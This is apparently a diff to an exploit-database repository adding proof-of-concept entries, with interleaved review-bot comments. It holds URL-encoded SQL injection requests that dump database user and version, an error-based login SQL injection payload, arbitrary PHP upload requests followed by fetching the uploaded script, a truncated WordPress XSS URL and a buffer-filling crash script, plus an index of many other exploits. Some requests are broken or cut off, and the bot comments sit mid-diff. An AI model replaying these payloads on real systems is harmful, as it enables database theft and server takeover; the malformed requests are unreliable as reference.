+ + + +# POC: +# 3) +# http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL] +# +GET /PATH/users_edit.php?currentrow_fd0=%2d%31%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Tue, 13 Nov 2018 12:21:09 GMT +Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9 +X-Powered-By: PHP/5.2.9 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html + +# POC: +# 4) +# http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL] +# +GET /PATH/personal_notebook_category_edit.php?currentrow_fd0=%2d%31%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, 
deflate +Cookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Tue, 13 Nov 2018 12:22:49 GMT +Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9 +X-Powered-By: PHP/5.2.9 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=97 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html \ No newline at end of file diff --git a/exploits/php/webapps/45877.txt b/exploits/php/webapps/45877.txt new file mode 100644 index 000000000..f7d7c6f82 --- /dev/null +++ b/exploits/php/webapps/45877.txt 
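Review bot: POC 4)'s heading repeats `users_edit.php?currentrow_fd0=[SQL]` from POC 3), but the request under it goes to `personal_notebook_category_edit.php`, so the heading should read `# http://localhost/[PATH]/personal_notebook_category_edit.php?currentrow_fd0=[SQL]`. The title covers only the file upload, while POC 3) and 4) are SQL injections in a different parameter; either split them into their own entry or extend the title the way the sibling entries name each issue. The multipart `boundary=` value in POC 1) is broken across two lines; if that is a capture artifact rather than the file's real content, the request should be re-captured so it replays as written, and the hunk's middle (the POC 2) form) appears to have been lost in rendering and is worth checking in the file itself.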
@@ -0,0 +1,48 @@
+# Exploit Title: Simple E-Document 1.31 - 'username' SQL Injection
+# Dork: N/A
+# Date: 2018-11-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.tecorange.com/index.php/download-free-open-source-software/79-simple-e-document-free-open-source-document-and-paper-m
+# Software Link: https://datapacket.dl.sourceforge.net/project/simplee-doc/simple_e_document_v_1_31.zip
+# Version: 1.31
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# //[PATH]//login.php
+# ....
+#10 if(!isset($_POST['op'])) $_POST['op']='';
+#11 if(!isset($_POST['username'])) $_POST['username']='';
+#12 if(!isset($_POST['password'])) $_POST['password']='';
+#13 if(!isset($op)) $op='';
+#14
+#15 $op = $_POST['op'];
+#16 $username= stripslashes($_POST['username']);
+#17 $password= stripslashes($_POST['password']);
+#18 $r_password = md5($password);
+#19
+#20 $sql = "SELECT * From edocphp_users WHERE username='$username' AND password ='$r_password'";
+# ....
+
+# POC:
+# 1)
+# http://localhost/[PATH]/login.php
+#
+POST /PATH/login.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 267
+username=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'
+HTTP/1.1 200 OK
+Date: Wed, 14 Nov 2018 07:44:24 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 241
+Keep-Alive: timeout=5, max=97
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
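Review bot: The source excerpt contains the whole story but the entry never draws it out: line #16 runs `stripslashes()` on the raw `username`, undoing any escaping a legacy magic_quotes setup would have added, and line #20 concatenates the result straight into the query string, so the issue is present on every PHP configuration. A line such as `# Root cause: stripslashes() at #16 strips escaping before the string-built query at #20; fix with prepared statements` would make the remediation obvious to a maintainer. The response is reported only as `Content-Length: 241`; state what in the body showed the query result so the PoC can be checked.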
diff --git a/exploits/php/webapps/45878.txt b/exploits/php/webapps/45878.txt
new file mode 100644
index 000000000..26322933b
--- /dev/null
+++ b/exploits/php/webapps/45878.txt
@@ -0,0 +1,84 @@ +# Exploit Title: 2-Plan Team 1.0.4 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-11-15 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://2-plan.com/ +# Software Link: https://datapacket.dl.sourceforge.net/project/to-plan-team/1.1.0/2-plan-team.tgz +# Version: 1.0.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Users.. +# http://localhost/[PATH]/managefile.php?action=upload&id=1 +# + +POST /[PATH]/managefile.php?action=upload&id=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/[PATH]/managefile.php?action=showproject&id=1&mode=added +Cookie: PHPSESSID=2e9jrile8jqaqe9q1acs4i30j6 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=--------------------------- +10091208795715239061851145440 +Content-Length: 1192 +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="numfiles" +1 +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="upfolder" +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="userfile1-title" +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="userfile1"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="userfile1" +phpinfo.php +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="userfile1-tags" +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="desc" +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="visible[]" 
+-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="sendto[]" +all +-----------------------------10091208795715239061851145440-- +HTTP/1.1 302 Found +Date: Wed, 14 Nov 2018 23:41:03 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Vary: Accept-Encoding +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=utf-8 +Transfer-Encoding: chunked + +GET /[PATH]/files/standard/ef/1/phpinfo_3978873.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=2e9jrile8jqaqe9q1acs4i30j6 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 23:41:07 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=95 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45879.txt b/exploits/php/webapps/45879.txt new file mode 100644 index 000000000..55830c90c --- /dev/null +++ b/exploits/php/webapps/45879.txt 
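Review bot: The follow-up GET to `files/standard/ef/1/phpinfo_3978873.php` answering 200 shows the actual defect, which the entry never states: the application appears to rename the upload with a numeric suffix but keeps the client-supplied `.php` extension and stores it under a web-reachable, script-executing path. Add a line such as `# Root cause: managefile.php keeps the original extension and stores uploads under files/ inside the web root; fix by allow-listing extensions and serving uploads from a non-executing location`. The body carries the `userfile1` part twice (once with a filename, once as a plain field) and the `boundary=` value is split across two lines; if these are capture artifacts the request should be re-captured so it replays as written.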
@@ -0,0 +1,69 @@
+# Exploit Title: PHP Mass Mail 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-11-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://phpmassmail.sourceforge.io/
+# Software Link: https://netix.dl.sourceforge.net/project/phpmassmail/phpmassmail/1.0.0/phpmassmail.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/send.php
+#
+# http://localhost/[PATH]/upload/[FILE]
+
+# ....
+#07 require("class.phpmailer.php");
+#08
+#09 $uploaddir = 'upload';
+#10 $key = 0;
+#11 $tmp_name = $_FILES["userfile"]["tmp_name"][$key];
+#12 $name = $_FILES["userfile"]["name"][$key];
+#13 $sendfile = "$uploaddir/$name";
+#14 move_uploaded_file($tmp_name, $sendfile);
+# ....
+
+POST /[PATH]/send.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/octet-stream
+Content-Length: 716
+Cookie: PHPSESSID=dhq0fbvco8d0sc0lem3l2kktk0
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------265001916915724: undefined
+Content-Disposition: form-data; name="userfile[]"; filename="phpinfo.php"
+
+-----------------------------265001916915724--
+HTTP/1.1 200 OK
+Date: Wed, 14 Nov 2018 19:27:39 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 719
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/send.php
+#
+# http://localhost/[PATH]/upload/[FILE]
+#
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/45880.txt b/exploits/php/webapps/45880.txt
new file mode 100644
index 000000000..c69b7e2a0
--- /dev/null
+++ b/exploits/php/webapps/45880.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
+# Date: 2018-11-15
+# Exploit Author: MTK
+# Vendor Homepage: https://ninjaforms.com
+# Softwae Link: https://wordpress.org/plugins/ninja-forms/
+# Version: Up to V3.3.17
+# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
+# CVE : CVE-2018-19287
+
+# Plugin description:
+# Ninja Forms is the ultimate FREE form creation tool for WordPress. Build forms within minutes
+# using a simple yet powerful drag-and-drop form creator. For beginners, quickly and easily
+# design complex forms with absolutely no code. For developers, utilize built-in hooks,
+# filters, and even custom field templates to do whatever you need at any step in
+# the form building or submission using Ninja Forms as a framework.
+
+# POC
+
+|_1_|
+
+http://127.0.0.1/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date&end_date=">&nf_form_filter&paged=1
\ No newline at end of file
diff --git a/exploits/windows/local/39666.txt b/exploits/windows/local/39666.txt
index 33e04bb6a..a9509e2fe 100644
--- a/exploits/windows/local/39666.txt
+++ b/exploits/windows/local/39666.txt
@@ -2,7 +2,7 @@ Sources: https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf https://github.com/sam-b/CVE-2014-4113
-EDB Mirror: https://www.exploit-db.com/docs/39665.pdf
+EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf Trigger and exploit code for CVE-2014-4113:
diff --git a/exploits/windows/local/40823.txt b/exploits/windows/local/40823.txt
index 8a017261d..4ad13d959 100644
--- a/exploits/windows/local/40823.txt
+++ b/exploits/windows/local/40823.txt
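Review bot: The request in the PoC cannot be replayed as written: the header says `Content-Type: application/octet-stream` while the body is multipart, and the boundary line reads `-----------------------------265001916915724: undefined` instead of a boundary; it needs `Content-Type: multipart/form-data; boundary=---------------------------265001916915724` and a clean boundary line. The quoted `send.php` lines 09–14 are the actual finding — `$_FILES["userfile"]["name"]` is joined to `upload/` and passed to `move_uploaded_file()` with no extension, type or size check — and deserve a one-line statement under the excerpt (PHP itself strips directory components from the client-supplied name, so this is an unrestricted upload, not path traversal). The second `# POC: 2)` block repeats the first verbatim with nothing after it and the file then ends in eight blank lines; drop the duplicate. A `PHPSESSID` cookie is sent but nothing says whether `send.php` is reachable without a login, and the entry should state whether the upload is pre-auth.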
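Review bot: The PoC URL ends at `end_date=">` with nothing after the closing quote, so as pasted it does not demonstrate script execution; the payload (and, judging by the `+1,29` hunk count against the lines visible here, further `|_2_|`-style entries) appears to have been stripped as markup and should be restored URL-encoded, e.g. `end_date=%22%3E%3Csvg%20onload%3Dalert(1)%3E`. The endpoint is `/wp-admin/edit.php?post_type=nf_sub`, so the reflected `end_date` value only executes in the browser of a logged-in user who can view submissions; the title should read `… - (Authenticated) Reflected Cross-Site Scripting` and a sentence should name the victim (an administrator following a crafted link). `# Softwae Link` is a typo for `# Software Link`, and `# CVE : CVE-2018-19287` has a stray space before the colon that breaks the header format the other entries use.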
@@ -2,7 +2,7 @@ Complete Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40823.zip Presentation:
-https://www.exploit-db.com/docs/40822.pdf
+https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016
diff --git a/exploits/windows_x86-64/dos/45869.py b/exploits/windows_x86-64/dos/45869.py
new file mode 100755
index 000000000..d7ccf799f
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45869.py
@@ -0,0 +1,29 @@
+# Exploit Title: Notepad3 1.0.2.350 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-11-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.rizonesoft.com/
+# Software Link: https://netix.dl.sourceforge.net/project/notepad3/Notepad3%20Build%20350/Notepad3-1.0.2.350.exe
+# Software Link: https://datapacket.dl.sourceforge.net/project/notepad3/Notepad3%20Build%20350/Notepad3-1.0.2.350_x86.zip
+# Version: 1.0.2.350
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# File / Set Encryption Passphrase / Encrypt using Passphrase
+
+#!/usr/bin/python
+
+buffer = "A" * 256
+
+payload = buffer
+try:
+ f=open("exp.txt","w")
+ print "[+] Creating %s bytes evil payload." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created."
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4730679c5..b64d34edb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
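Review bot: The `#!/usr/bin/python` line sits after the header comments (line 17 of the new file), where it is just another comment; since the file is added as mode `100755`, it should be moved to line 1 so the interpreter line actually takes effect. The body uses Python 2 `print` statements and a bare `except:` that swallows everything, including `KeyboardInterrupt`, and leaks the handle on a write failure; `with open("exp.txt", "w") as f: f.write(payload)` guarded by `except IOError as e:` would close the file and report the reason. The PoC names the reproduction path (File / Set Encryption Passphrase) and a 256-byte passphrase but never says what is observed — hang, crash, exception address — so a one-line `# Result:` comment describing the crash would let a reader confirm they are hitting the same bug rather than a benign length limit.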
@@ -6190,6 +6190,7 @@ id,file,description,date,author,type,platform,port 45829,exploits/windows/dos/45829.c,"Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service",2018-11-13,hyp3rlinx,dos,windows, 45850,exploits/windows_x86-64/dos/45850.py,"AMPPS 2.7 - Denial of Service (PoC)",2018-11-14,"Ihsan Sencan",dos,windows_x86-64, 45859,exploits/windows/dos/45859.py,"Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)",2018-11-14,Daniel,dos,windows, +45869,exploits/windows_x86-64/dos/45869.py,"Notepad3 1.0.2.350 - Denial of Service (PoC)",2018-11-15,"Ihsan Sencan",dos,windows_x86-64, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -6674,7 +6675,7 @@ id,file,description,date,author,type,platform,port 4178,exploits/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Local Privilege Escalation",2007-07-12,"Zohiartze Herce",local,windows, 4203,exploits/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords",2007-07-19,bunker,local,multiple, 4204,exploits/windows/local/4204.php,"PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow",2007-07-20,shinnai,local,windows, -4218,exploits/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass",2007-07-24,shinnai,local,windows, +4218,exploits/windows/local/4218.php,"PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass",2007-07-24,shinnai,local,windows, 4229,exploits/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",local,windows, 4231,exploits/aix/local/4231.c,"IBM AIX 5.3 SP6 - Capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,local,aix, 4232,exploits/aix/local/4232.sh,"IBM AIX 5.3 SP6 - 'pioout' Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,local,aix, 
@@ -6701,9 +6702,9 @@ id,file,description,date,author,type,platform,port 4460,exploits/linux_x86-64/local/4460.c,"Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",local,linux_x86-64, 4515,exploits/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,local,solaris, 4516,exploits/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,local,solaris, -4517,exploits/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,local,windows, +4517,exploits/windows/local/4517.php,"PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass",2007-10-11,shinnai,local,windows, 4531,exploits/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,local,windows, -4553,exploits/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,local,windows, +4553,exploits/windows/local/4553.php,"PHP 5.x COM - Safe Mode / Disable Functions Bypass",2007-10-22,shinnai,local,windows, 4564,exploits/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,local,multiple, 4570,exploits/multiple/local/4570.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)",2007-10-27,bunker,local,multiple, 4571,exploits/multiple/local/4571.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)",2007-10-27,bunker,local,multiple, 
@@ -9733,7 +9734,7 @@ id,file,description,date,author,type,platform,port 41999,exploits/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation",2016-02-22,"Andrey Konovalov",local,linux, 42000,exploits/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",local,windows, 42020,exploits/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",local,windows, -42045,exploits/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation",2017-05-22,"Google Security Research",local,linux, +42045,exploits/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Local Privilege Escalation",2017-05-22,"Google Security Research",local,linux, 42053,exploits/linux/local/42053.c,"KDE 4/5 - 'KAuth' Local Privilege Escalation",2017-05-18,Stealth,local,linux, 42059,exploits/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,local,windows, 42076,exploits/linux/local/42076.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",local,linux, 
@@ -9765,7 +9766,7 @@ id,file,description,date,author,type,platform,port 42310,exploits/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Local Privilege Escalation",2017-07-10,LiquidWorm,local,windows, 42319,exploits/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Local Privilege Escalation",2017-07-13,geoda,local,windows, 42325,exploits/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",local,windows, -42334,exploits/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",local,macos, +42334,exploits/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Privilege Escalation",2017-07-18,"Mark Wadham",local,macos, 42356,exploits/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",local,linux, 42357,exploits/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",local,linux, 42368,exploits/windows_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,local,windows_x86-64, 
@@ -9934,7 +9935,7 @@ id,file,description,date,author,type,platform,port 44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows, 45565,exploits/windows_x86-64/local/45565.py,"Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)",2018-10-09,"Matteo Malvica",local,windows_x86-64, 44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows, -44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux, +44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Local Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux, 44644,exploits/hardware/local/44644.txt,"Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC)",2017-03-31,unknownv2,local,hardware, 44649,exploits/windows/local/44649.py,"Prime95 29.4b8 - Stack Buffer Overflow (SEH)",2018-05-18,crash_manucoot,local,windows, 44652,exploits/linux/local/44652.py,"DynoRoot DHCP Client - Command Injection",2018-05-18,"Kevin Kirsche",local,linux, 
@@ -9945,7 +9946,7 @@ id,file,description,date,author,type,platform,port 44680,exploits/windows_x86/local/44680.py,"R 3.4.4 - Local Buffer Overflow (DEP Bypass)",2018-05-21,"Hashim Jawad",local,windows_x86, 44688,exploits/linux/local/44688.txt,"Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read",2018-05-22,"Paul Taylor",local,linux, 44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android, -44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux, +44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux, 44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows, 44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows, 44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows, 
@@ -9996,7 +9997,7 @@ id,file,description,date,author,type,platform,port 45058,exploits/linux/local/45058.rb,"Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)",2018-07-19,Metasploit,local,linux, 45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows, 45072,exploits/windows/local/45072.txt,"Splinterware System Scheduler Pro 5.12 - Privilege Escalation",2018-07-23,bzyo,local,windows, -45126,exploits/solaris/local/45126.c,"Sun Solaris 11.3 AVS - Local Kernel root Exploit",2018-08-02,mu-b,local,solaris, +45126,exploits/solaris/local/45126.c,"Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation",2018-08-02,mu-b,local,solaris, 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, 45089,exploits/linux/local/45089.py,"Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux, 
@@ -10103,6 +10104,9 @@ id,file,description,date,author,type,platform,port 45832,exploits/linux/local/45832.py,"xorg-x11-server < 1.20.1 - Local Privilege Escalation",2018-11-13,bolonobolo,local,linux, 45846,exploits/linux/local/45846.py,"ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)",2018-11-14,"Magnus Klaaborg Stubman",local,linux, 45854,exploits/macos/local/45854.txt,"SwitchVPN for macOS 2.1012.03 - Privilege Escalation",2018-11-14,"Bernd Leitner",local,macos, +45865,exploits/linux/local/45865.php,"PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass",2018-11-14,"Anton Lopanitsyn",local,linux, +45866,exploits/multiple/local/45866.html,"Webkit (Safari) - Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple, +45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote 